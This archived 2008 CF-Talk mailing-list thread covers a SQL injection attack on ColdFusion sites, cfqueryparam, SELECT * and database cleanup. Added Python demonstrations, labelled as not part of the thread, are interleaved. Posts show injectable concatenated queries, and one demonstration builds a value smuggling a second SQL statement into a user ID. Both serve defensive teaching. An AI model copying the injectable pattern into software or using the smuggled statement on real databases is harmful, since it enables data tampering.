ColdFusion Talk (CF-Talk)
(ot) URL Hack Attempt Leaves Me Scratching My Head
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309751
----- Excess quoted text cut - see Original Post for more -----
Code that is disabled by CFML comments isn't executed, and is therefore
perfectly safe.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Pete Ruckelshaus
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309746
I just got hit by this on one of my older sites (inconsistent use of
cfqueryparam) yesterday. I found an immensely helpful and very timely
posting here:
http://russ.michaels.me.uk/index.cfm/2008/7/24/SQL-Injection-Attacks--How-to-protect_yourself
(I believe "Snake" is a list participant). I spent 7 hours editing all of my
queries to make sure I was using cfqueryparam consistently throughout, then
ran Snake's AMAZINGLY EFFECTIVE SQL solution to clean up the
database... otherwise it would have been down to editing thousands of
database records. Additionally, I switched all form transactions over to
POSTs and made sure everything was properly scoped.
In addition, I added a couple of scripts to my application.onRequestStart();
one of them ensures that the referring page on a POST transaction is from my
site:
<cfif CGI.http_referer DOES NOT CONTAIN CGI.server_name>
    <cfsavecontent variable="msg"><p>You have attempted to perform an illegal operation.</p></cfsavecontent>
    <cfabort showerror="#msg#">
</cfif>
The other script checks the URL and FORM scopes to ensure that it doesn't
contain anything nasty...basically the last code example from Snake's blog
posting, with some stuff added.
Pete
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309743
Interesting question:
<!--- <cfif isdefined('url.dimension')>
    <cfquery name="test" datasource="#DB#" username="#USER#" password="#PASS#">
        select age,size
        from accessories
        where age='#url.age#' and visible=1
    </cfquery>
</cfif> --->
This is a commented-out query in the code. Do any of you think it can be
processed while commented out? I don't think so, but I am curious; these hackers
can do crazy stuff. Probably I will get the answer: put cfqueryparam in the
commented query, or delete it :)
Radek
On Thu, Jul 24, 2008 at 2:33 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309742
I set up a scheduled task to check my database every 15 minutes. It
looks for my entry in the users table, and compares my email address
and website address with what is in the database. If it differs, I
get an email. I did the same thing for 10 different tables.
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309740
I won't mention names, but a few popular websites I use have been
hit... one has been down for 3 days now.
Recently I set up an anonymous FTP server... I needed a few people to
send me files and I thought that would be the easiest way. The URL
was private, not published anywhere... 2 days later my hard drive
filled up. But I didn't see any files in the FTP directory. They
created a directory whose name was a blank space, so a quick look
wouldn't see any extra files there, but there were gigabytes of porn,
movies and music in there. The funny thing is you can't delete a
blank directory name from Windows Explorer, or even a command prompt.
The trick is to go into a command prompt and do a directory listing that
shows the DOS version of the filename and delete that!
These people are slick... we have to start fighting back somehow.
----- Excess quoted text cut - see Original Post for more -----
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309672
Yes, exactly. Run the current attack; I am doing it to see how I am securing
the site, and it works!
Happy attacking :)
On Thu, Jul 24, 2008 at 3:39 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309671
> If I do find any vulnerabilities, is there something I can run
> against the database to see if it has been infected?
Well, for the current attack, you would look at your
varchar/nvarchar/text/ntext columns to see if anything's been appended to
them. This should be fairly easy to identify.
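Two checks of the kind described in this thread, Al's scheduled canary comparison and Dave's scan of string columns for appended content, as an added example that is not code from the thread or from any poster. It runs against a constructed in-memory SQLite database; the table names, the canary values and the "<!-- constructed marker -->" string are all assumptions made for the demo, to be replaced with your own known-good values and whatever pattern your incident left behind.

```python
import sqlite3
from typing import Dict, List, Tuple

MARKER = "<!-- constructed marker -->"   # stands in for whatever got appended


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample schema with text columns, plus one row whose text
    column has had content appended to it (the symptom Dave describes)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(user_id INTEGER PRIMARY KEY, email TEXT, website TEXT);
        CREATE TABLE item(item_id INTEGER PRIMARY KEY, location TEXT, note TEXT);
        INSERT INTO users VALUES (1, 'admin@example.org', 'http://www.example.org/');
        INSERT INTO users VALUES (2, 'bob@example.org',   'http://bob.example.org/');
        INSERT INTO item  VALUES (10, 'shelf-a', 'fragile');
        INSERT INTO item  VALUES (11, 'shelf-b', 'heavy');
    """)
    # Simulated tampering: append text to one existing value.
    conn.execute("UPDATE item SET note = note || ? WHERE item_id = 11", (MARKER,))
    return conn


# Known-good values for one row per table: table -> (key column, key value, {column: expected}).
# Al's scheduled task does this comparison every 15 minutes and mails on any difference.
CANARIES: Dict[str, Tuple[str, object, Dict[str, str]]] = {
    "users": ("user_id", 1, {"email": "admin@example.org", "website": "http://www.example.org/"}),
}


def check_canaries(conn: sqlite3.Connection, canaries=CANARIES) -> List[str]:
    """Return one message per canary column whose stored value differs from the
    known-good value. Identifiers come from our own config, never from a request,
    so they may be interpolated; the key value is bound as a parameter."""
    findings = []
    for table, (key_col, key_val, expected) in canaries.items():
        cols = ", ".join(f'"{c}"' for c in expected)
        row = conn.execute(
            f'SELECT {cols} FROM "{table}" WHERE "{key_col}" = ?', (key_val,)
        ).fetchone()
        if row is None:
            findings.append(f"{table}: canary row {key_col}={key_val} is missing")
            continue
        for col, actual in zip(expected, row):
            if actual != expected[col]:
                findings.append(f"{table}.{col}: expected {expected[col]!r}, found {actual!r}")
    return findings


def text_columns(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """(table, column) for every column declared with a string type. In SQLite
    that is TEXT/CHAR/CLOB, the analogue of varchar/nvarchar/text/ntext."""
    out = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'"
    )]
    for table in tables:
        for name, ctype in conn.execute("SELECT name, type FROM pragma_table_info(?)", (table,)):
            if any(t in (ctype or "").upper() for t in ("TEXT", "CHAR", "CLOB")):
                out.append((table, name))
    return out


def scan_text_columns(conn: sqlite3.Connection, needle: str) -> List[Tuple[str, str, int, str]]:
    """Every (table, column, rowid, value) whose text contains `needle`.
    instr() is a plain substring match, so the needle needs no LIKE escaping."""
    hits = []
    for table, col in text_columns(conn):
        rows = conn.execute(
            f'SELECT rowid, "{col}" FROM "{table}" WHERE instr("{col}", ?) > 0', (needle,)
        ).fetchall()
        hits.extend((table, col, rowid, value) for rowid, value in rows)
    return hits


if __name__ == "__main__":
    db = build_sample_db()
    print("canary findings:", check_canaries(db))            # [] until the row is changed
    print("appended content:", scan_text_columns(db, MARKER))  # the tampered item row
```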
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309670
Al Musella, DPM wrote:
> I can't believe this isn't a big news story.. it has been the focus
> of my life for the last 48 hours:)
To be a big news story, it would have to be big and new. It is neither.
The impact it has had on the net is negligible. Who can mention 3 sites
that have been hit that you would have known about if you weren't a
ColdFusion developer?
The scale and coordination of the attacks are nothing new either. Mail
servers have been under this sort of attack permanently for as long as I
can remember. Just bring a blackhole mailserver online that appears to
be an open relay and see what happens.
The techniques used for (and against) this attack are nothing new. This
attack has been running against pages with an .asp extension since May.
It is just that only recently they switched from just attacking ASP to
other extensions as well.
And on top of that there is a story since Monday about DNS that is much
scarier and much closer to home to most readers.
Jochem
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309669
I noticed that since I started securing the site, also with the cfif EXEC, I have
fewer hits with the code; 3 days ago and earlier I got hit about every hour,
these past 2 days I got 2 hits a day to the exact same page with the exact same
variables in the URL....
On Thu, Jul 24, 2008 at 3:05 PM, Radek Valachovic <rentgeeen@gmail.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Cutter (CFRelated)
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309667
Radek,
The point is, without the cfqueryparam it doesn't really get there. The
passed user_id isn't bound in the query, so the ;{everything else} gets
processed as additional SQL statements. When the value is bound, then
the ;{and everything else} would actually be passed into the field
(since it isn't being processed by your SQL server as a statement, just
a value), failing the field definition and throwing an error.
Steve "Cutter" Blades
Adobe Certified Professional
Advanced Macromedia ColdFusion MX 7 Developer
_____________________________
http://blog.cutterscrossing.com
Radek Valachovic wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309668
Great, yes, I understand: basically it runs another script against the database, so
it assumes that it is not part of the user_id. Good, thanks.
On Thu, Jul 24, 2008 at 3:05 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew Smith
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309666
> I was just looking into that myself.
>
> http://qpscanner.riaforge.org/
I plan on running this against the code of my sites just to be sure.
If I do find any vulnerabilities, is there something I can run against the
database to see if it has been infected?
Thanks.
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309664
Correction: the SQL in the text should be:
SELECT location FROM item WHERE user_id = #url.user_id#
not SELECT location FROM item WHERE url.user_id = #url.user_id#
Sorry.
On Thu, Jul 24, 2008 at 2:55 PM, Radek Valachovic <rentgeeen@gmail.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309665
> How can it be processed when USER_ID in the database is
> specified for LENGTH 15 and USER_ID with the hacker code has
> a length like 100?
For the purpose of preventing SQL injection, the length of the field in your
prepared statement doesn't matter. It is enough for it to be a prepared
statement, which you build in CF using CFQUERYPARAM. Without it, the
database has no idea which parts of the query are supposed to be executable
SQL, and which parts are supposed to be data.
In a successful SQL injection attack, the value that's injected would be
more than just your USER_ID value; it would also contain executable SQL
code, and your database would simply execute the code; it would not assume
that this code is supposed to be part of your USER_ID value.
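The difference Dave and Cutter describe, shown on a constructed in-memory SQLite database as an added example (not code from the thread): the concatenated query treats everything after the ';' as a second statement, the bound parameter treats the whole value as data, and the integer check stands in for what cfsqltype="CF_SQL_INTEGER" enforces. The item table and the appended-text statement are constructed for the demo, and executescript() imitates a server that runs a ';'-separated batch.

```python
import sqlite3
from typing import List

MARKER = "<!-- constructed marker -->"
# A value of the shape the thread describes: the real id, then a ';' and more SQL.
# The trailing statement here only appends a harmless marker to a text column.
TAINTED_USER_ID = f"125456; UPDATE item SET location = location || '{MARKER}'"


def make_db() -> sqlite3.Connection:
    """Constructed item table with one row for user 125456."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE item(item_id INTEGER PRIMARY KEY, user_id INTEGER, location TEXT);
        INSERT INTO item VALUES (1, 125456, 'shelf-a');
        INSERT INTO item VALUES (2, 777,    'shelf-b');
    """)
    return conn


def marked_rows(conn: sqlite3.Connection) -> int:
    """How many location values have had the marker appended (0 means untouched)."""
    return conn.execute(
        "SELECT count(*) FROM item WHERE instr(location, ?) > 0", (MARKER,)
    ).fetchone()[0]


def lookup_concatenated(conn: sqlite3.Connection, raw_user_id: str) -> None:
    """WHERE user_id = #url.user_id# with no cfqueryparam. The database cannot
    tell where the value ends, so the text after ';' runs as its own statement.
    SQLite's execute() refuses multi-statement strings; executescript() mimics
    a server that accepts a batch."""
    sql = f"SELECT location FROM item WHERE user_id = {raw_user_id}"
    conn.executescript(sql)


def lookup_bound(conn: sqlite3.Connection, raw_user_id: str) -> List[str]:
    """cfqueryparam with only value=: the whole string is bound as one value.
    '125456; UPDATE ...' equals no integer, so it matches nothing and nothing
    else executes (Brad's point: secure, though an insert could store junk)."""
    rows = conn.execute(
        "SELECT location FROM item WHERE user_id = ?", (raw_user_id,)
    ).fetchall()
    return [r[0] for r in rows]


def lookup_bound_typed(conn: sqlite3.Connection, raw_user_id: str) -> List[str]:
    """cfqueryparam with cfsqltype="CF_SQL_INTEGER": the value must parse as an
    integer before the query runs, otherwise ColdFusion throws; int() does the same."""
    try:
        user_id = int(raw_user_id.strip())
    except ValueError:
        raise ValueError(f"user_id is not an integer: {raw_user_id[:40]!r}") from None
    rows = conn.execute(
        "SELECT location FROM item WHERE user_id = ?", (user_id,)
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    lookup_concatenated(db, TAINTED_USER_ID)
    print("rows altered by concatenation:", marked_rows(db))   # 2

    db = make_db()
    print("bound, tainted value:", lookup_bound(db, TAINTED_USER_ID), marked_rows(db))  # [] 0
    print("bound, clean value:", lookup_bound_typed(db, "125456"))                    # ['shelf-a']
```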
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309663
Dave Phillips wrote:
----- Excess quoted text cut - see Original Post for more -----
To clarify the clarification, an execution plan is *always* built,
whether the SQL uses the best practice of <cfqueryparam...> or not.
Without the <cfqueryparam...> many more execution plans may be generated,
depending on the nature of the queries and the application they live in
and its usage. Thus these non-queryparam plans can easily be pushed out of
the cache faster, and thus the problem described will live for a shorter
time. But it can happen either way.
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309661
Okay, what about this: for example, column ITEMOID has in the DB a max length of 15
and it is numeric.
Integer is -2,147,483,648 to 2,147,483,647 = 10; the point is 10 or 15
doesn't matter.
I will specify for ITEMOID in the DB maxl = 15.
Example query is:
SELECT location FROM item WHERE url.user_id = #url.user_id#
The URL is gonna look like this example:
http://mydomain.com/index.cfm?user_id=125456
Now imagine the hacker code (DECLARE etc. etc.) will be added to the end:
http://mydomain.com/index.cfm?user_id=125456;DECLARE........
How can it be processed when USER_ID in the database is specified for LENGTH 15
and USER_ID with the hacker code has a length like 100?
I guess you're gonna say that's why you have to use:
SELECT location FROM item WHERE url.user_id = <cfqueryparam value="#url.user_id#" cfsqltype="CF_SQL_INTEGER">
to validate it.
I understand that, but why is it not validated already when in the DB it is
specified with length 15, and using this query:
SELECT location FROM item WHERE url.user_id = #url.user_id#
it should work, and I have to use another validation in code using
cfqueryparam?:
SELECT location FROM item WHERE url.user_id = <cfqueryparam value="#url.user_id#" cfsqltype="CF_SQL_INTEGER">
Thanks, Radek
On Thu, Jul 24, 2008 at 2:21 PM, Adrian Lynch <contact@adrianlynch.co.uk>
wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309660
What Charlie says is correct. To elaborate on the performance part...
If you use proper indexes in your database it is possible to have statements
that are called "covered selects". This means that every column in the
select clause and where clause is part of an index, and the records can
be retrieved without ever hitting the table. Example:
SELECT order_id
FROM orders
WHERE cust_last_name = 'Wood'
Let's suppose I had an index called IX_cust_name on my cust_last_name
column (because I searched it often) and I added order_id in as an included
column in that index.
The execution plan would MOST LIKELY perform an index seek on IX_cust_name
(very, very fast) and return the order_id stored alongside it,
probably on the same page of memory. Your database never had to even hit the
table. If your database is stored on a SAN with a large cache, your oft-used
index might even be cached in the controller memory.
Now, suppose you had taken a shortcut and done the following:
SELECT *
FROM orders
WHERE cust_last_name = 'Wood'
Even though you are only using the order_id column (which no one would be
able to tell easily), your execution plan now performs an index seek AND
performs a bookmark lookup back to the table with the key stored in the
index to fetch all the other columns in that row, whether they are needed at
all. Bookmark lookups can KILL you in large result sets.
A lot of this stuff is so negligible you won't notice it with a small
database, but databases have a way of growing until performance is
unbearable. Also, additional tables added to the select later will cause
the amount of data being returned to blossom. Anyway, I hope that helps put
some reasoning to it.
~Brad
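Brad's covered select versus SELECT * with a bookmark lookup, reproduced on SQLite with EXPLAIN QUERY PLAN as an added example (not code from the thread). The orders table and IX_cust_name follow his description but are constructed here; SQLite has no INCLUDE clause, so order_id is added as a trailing index column, which gives the same coverage.

```python
import sqlite3
from typing import List, Tuple


def make_orders_db() -> sqlite3.Connection:
    """Constructed orders table. order_no is the rowid; order_id is a separate
    business key, so it is only available from the index if we put it there."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE orders(
            order_no       INTEGER PRIMARY KEY,
            order_id       TEXT NOT NULL,
            cust_last_name TEXT NOT NULL,
            total          REAL
        );
        -- searched column first, then the 'included' column
        CREATE INDEX IX_cust_name ON orders(cust_last_name, order_id);
    """)
    conn.executemany(
        "INSERT INTO orders(order_id, cust_last_name, total) VALUES (?, ?, ?)",
        [("A-1001", "Wood", 19.99), ("A-1002", "Wood", 5.00), ("A-1003", "Forta", 42.00)],
    )
    return conn


COVERED_SQL = "SELECT order_id FROM orders WHERE cust_last_name = ?"
STAR_SQL = "SELECT * FROM orders WHERE cust_last_name = ?"


def plan(conn: sqlite3.Connection, sql: str, params: Tuple = ()) -> str:
    """Join the 'detail' text of every EXPLAIN QUERY PLAN row for the query."""
    return " | ".join(row[-1] for row in conn.execute("EXPLAIN QUERY PLAN " + sql, params))


def is_covered(conn: sqlite3.Connection, sql: str, params: Tuple = ()) -> bool:
    """SQLite reports 'USING COVERING INDEX' when every referenced column is in the
    index and the table itself is never read; plain 'USING INDEX' means an index
    seek followed by a row fetch from the table (Brad's bookmark lookup)."""
    return "COVERING INDEX" in plan(conn, sql, params)


def order_ids_for(conn: sqlite3.Connection, last_name: str) -> List[str]:
    """The covered query itself, returning order_ids for one customer."""
    return [r[0] for r in conn.execute(COVERED_SQL, (last_name,))]


if __name__ == "__main__":
    db = make_orders_db()
    print(plan(db, COVERED_SQL, ("Wood",)))  # ... USING COVERING INDEX IX_cust_name ...
    print(plan(db, STAR_SQL, ("Wood",)))     # ... USING INDEX IX_cust_name ... (table rows fetched too)
    print(order_ids_for(db, "Wood"))
```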
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Phillips
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309655
(Brad) >> This is starting to sound like a bad multiple choice question from
a college final... :)
Especially our college, Brad. ;-)
(Claude) >> It may be a silly question, but why will a SELECT * break
because an unused column was dropped?
To clarify, it is a SELECT * query with a CFQUERYPARAM in it. Because the
first time the query is executed, an execution plan is built and cached.
That execution plan extrapolates all the columns from the table since the *
was used. Now, once the query is executed once, drop a column from the
table and run the query again. It will fail because the column it is trying
to reference (through the cached execution plan) is no longer there.
Example table:
Table name: user
Columns: user_id, firstname, lastname, address1, address2, address3, city,
state, zip
CF code:
<cfquery datasource="whatever" name="qGetUser">
    SELECT *
    FROM user
    WHERE user_id = <cfqueryparam value="#url.user_id#" cfsqltype="cf_sql_integer">
</cfquery>
Execute the CF Code - now the execution plan that is cached has a SELECT
statement that looks something like this:
SELECT user_id, firstname, lastname, address1, address2, address3, city,
state, zip
FROM user
WHERE user_id = (param)
Now, every time the query is run, it will use that execution plan until the
query changes (not the parameter, the query).
Okay, so now some db guy decides that address3 isn't in use and decides to
drop it on a whim (we'll fire him later).
Guess what, now every execution of your query will fail because 'address3'
does not exist in the user table.
It is true what someone said yesterday, that you could go into your code,
change a space or new line, and rerun your code and now it will work
(because the execution plan has been rebuilt). However, how many failed
requests between the time the column was dropped and you change your code
will occur? Who knows. One is too many, that's for sure.
So, as I stated before, and to take a spin off of Ben's recent comment:
It is always a good idea to never use SELECT * when using CFQUERYPARAM and
since it is always a good idea to use CFQUERYPARAM then it is always a good
idea to never use SELECT *. :)
You can quote me on that. ;-)
Dave Phillips
Author: Bryan Hogan
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309656
It will be secured, but it is better IMO to use the maxlength attribute.
It should match your schema. If I were doing this the maxlength on both
my cfqueryparam and column would be the maximum length of allowed email
addresses. My standard length for passwords can be no longer than 8
characters. So my column would have a max length of 8 and my
cfqueryparam would have the same value.
Remember to not allocate room for more than you are going to use.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309657
> > If you don't really care
>
> I don't really care measuring the difference it makes,
> because it must certainly be marginal, and it is not because
> I don't care the difference it can made that I cannot make a
> comment about it.
If you want to be a contrarian for the sake of being a contrarian, go right
ahead. However, you speculated that there might be overhead in creating an
execution plan, when one is created whether you use CFQUERYPARAM or not!
Then, immediately after that, you wrote that you don't care one way or the
other.
If you don't care one way or the other, why would that speculation be a
deciding factor about whether to use CFQUERYPARAM? It seems to me that your
sole justification for not using it, or using it selectively, or whatever,
is that it's too much trouble to type it out. And if that's true, that's
fine with me, because I don't really care about your applications
specifically.
It may well be the case that under specific conditions, there is a cost to
using CFQUERYPARAM. For example, there may be some queries that benefit from
having new execution plans generated each time they're run, instead of using
a cached execution plan. But you have failed to identify any of those
specific edge cases. You're not recommending that people attempt to identify
these edge cases, either. And, in the absence of evidence about a specific
case, the safe assumption is that building a prepared statement will not
only provide complete protection against SQL injection, but will also
improve performance. In ANY case, building a prepared statement that uses
CFQUERYPARAM to wrap every piece of user-supplied data will provide complete
protection against SQL injection, by its very nature - it tells the database
the difference between executable code and data.
Instead, you're throwing up a smokescreen of crap about why people shouldn't
use it, or why they should be more selective in using it. You're willing to
rely on all sorts of other things to provide what you see as equivalent to
the protection you get from prepared statements - making sure your MySQL
database is configured a certain non-default way, filtering out "bad words"
from incoming HTTP requests, etc - but it would be easier and more reliable
to just build the prepared statements in the first place!
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309654
Absolutely. Minimally, just using a cfqueryparam tag with the value
attributes is enough to let the SQL server know the difference between the
SQL statement itself and the parameters being passed into it. With that
distinction, you may get crap data in your database if it is an insert or an
update, but arbitrary and malicious code will NEVER get into the cfquery and
be executed as SQL.
The maxlength and type are just additional checks which will cause an error
to be thrown from ColdFusion when bad data is passed in. They are a very
good idea, but they aren't required.
~Brad
> So if I won't use maxlength, is it still gonna be secured? thanks
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309652
> So if I won't use maxlength, is it still gonna be secured?
Yes.
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309653
Charlie Griefer wrote:
> Not using SELECT * is more of a "best practices" kind of thing.
>
> When you use it, you're potentially pulling more information than you need,
> which is inefficient.
It can also lead to very hard to debug errors. When "*" is used, the
list of columns can become cached. If the database changes, this cache
does not necessarily get updated. The code will then break because the
list of columns it is trying to get does not match the database any
more, even if the CFML was not actually using the columns that were
added or removed.
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309651
So if I won't use maxlength, is it still gonna be secured? thanks
On Thu, Jul 24, 2008 at 2:23 PM, Ben Forta <ben@forta.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309649
Your max length in this scenario should most likely be the size of the
database column in question. If you use a varchar(50) to store your E-mail
address, then you know that the only valid strings coming into this query
are going to be 50 characters or less.
> What would you suggest for this kind of thing:
>
> Select USERID
> from users
> where email = '#trim(arguments.email)#' and password =
> '#trim(arguments.password)#'
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309650
MAXLENGTH would typically be the maximum the underlying table allows or the
maximum you want to accept. And MAXLENGTH is optional.
--- Ben
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309648
Whatever the length of the column in your DB.
Adrian
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309647
This is starting to sound like a bad multiple choice question from a college
final... :)
~Brad
> Fine, it's always a good idea to never use *
>
> ;-)
>
> --- Ben
Author: Jim Wright
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309645
On Thu, Jul 24, 2008 at 11:20 AM, Claude Schneegans <schneegans@internetique.com> wrote:
> A very particular situation though.
Perhaps, but the following demonstrates how this kind of issue can be even
more problematic when the table is changed in such a way that no error is
thrown by the view...
CREATE TABLE tmpTest(foo1 int, bar2 int)
GO
INSERT INTO tmpTest VALUES(1, 2)
GO
CREATE VIEW tmpView AS SELECT * FROM tmpTest
GO
SELECT * FROM tmpView -- Note the column names and the associated values
GO
ALTER TABLE tmpTest DROP COLUMN foo1
GO
ALTER TABLE tmpTest ADD foo1 int
GO
UPDATE tmpTest SET foo1 = 1
SELECT * FROM tmpView -- Note the column names and the associated values (and no error being thrown)
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309646
What would you suggest for this kind of thing:
Select USERID
from users
where email = '#trim(arguments.email)#' and password =
'#trim(arguments.password)#'
Something like this?
Select USERID
from users
where email = <cfqueryparam value="#trim(arguments.email)#"
cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam
value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?">
I put question marks for MAXLENGTH, still thinking if I should specify it for
more security (but guessing the length of emails, someone can be rejected) or can
it be without MAXLENGTH?
Radek
----- Excess quoted text cut - see Original Post for more -----
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309644
Fine, it's always a good idea to never use *
;-)
--- Ben
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309643
>>it's safe to say that avoiding "*" is a good idea,
Now that's the kind of statement I prefer: "a good idea",
better than *always* or *never* :-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309640
> It may be a silly question, but why will a SELECT * break
> because an unused column was dropped?
For the same reason that SELECT * will break if you use it in a view, run
the view, then change the underlying schema. The "*" gets dereferenced to
actual columns in the execution plan, which gets cached. If the columns
change, the execution plan may no longer be valid.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309639
>> If you don't really care
I don't really care about measuring the difference it makes, because it must
certainly be marginal, and it is not because I don't care about the difference
it can make that I cannot make a comment about it.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309638
> A very particular situation though. It will not prevent me
> from using SELECT * when I need all fields. This is more
> efficient than list all of them.
It may be more efficient for you as you type them out, but it will be less
efficient for your database, which has to figure out what "*" represents by
querying its own information schema. It also won't be more efficient for
someone following along behind you, because they won't be able to infer the
schema from the query.
In the first case, the performance difference will admittedly be minor. In
the second case, perhaps no one but you will ever edit the code that you
write. Nevertheless, it's safe to say that avoiding "*" is a good idea, and
for most people it's easier to adhere to a set of best practices rather than
evaluating everything they do, every time they do it, to determine what to
do right now.
Author: Charlie Griefer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309637
On Thu, Jul 24, 2008 at 10:48 AM, Radek Valachovic <rentgeeen@gmail.com> wrote:
> Yeah, I was reading in the forum this one, that using SELECT * is not good,
> can you explain why on a short example? What are the pros and cons, what other type of
> security is it gonna give me? Thanks
>
Not using SELECT * is more of a "best practices" kind of thing.
When you use it, you're potentially pulling more information than you need,
which is inefficient. Additionally, specifying all of the columns you're
pulling is more self-documenting.
I'd much rather see:
SELECT
    u.userName
  , u.userPhone
  , u.userEmail
  , u.userAddress
FROM
    Users u
WHERE
    ...
than
SELECT * FROM Users
with the former, I have a better idea of what i'm dealing with (without the
need to <cfdump> the query and see it).
--
A byte walks into a bar and orders a pint. Bartender asks him "What's
wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought
you looked a bit off."
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309636
> Ok, this is another example where CFQP is useful, as the doc says.
> But if the query is not likely to be executed often, which is
> the case with small sites, generating the execution plan
> might represent an overhead on the contrary.
> (just assuming, I have not run tests, and I don't really care ;-)
If you don't really care, why make the assertion?
The database ALWAYS generates an execution plan, whether you use
CFQUERYPARAM or not. CFQUERYPARAM simply makes it more likely that the
database will be able to reuse an execution plan, as it makes that plan more
general that it would otherwise be.
> Understand me correctly, I never said that CFQP is NEVER
> useful, I just don't like ayatollah statements like SHOULD *always*!
Sometimes "always" is the right answer.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309635
>>When your database executes a SQL statement, it generates an
execution plan
that best fits that statement and it caches that plan in memory for later
use.
Ok, this is another example where CFQP is useful, as the doc says.
But if the query is not likely to be executed often, which is the case
with small sites,
generating the execution plan might represent an overhead on the contrary.
(just assuming, I have not run tests, and I don't really care ;-)
Understand me correctly, I never said that CFQP is NEVER useful, I just
don't
like ayatollah statements like SHOULD *always*!
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
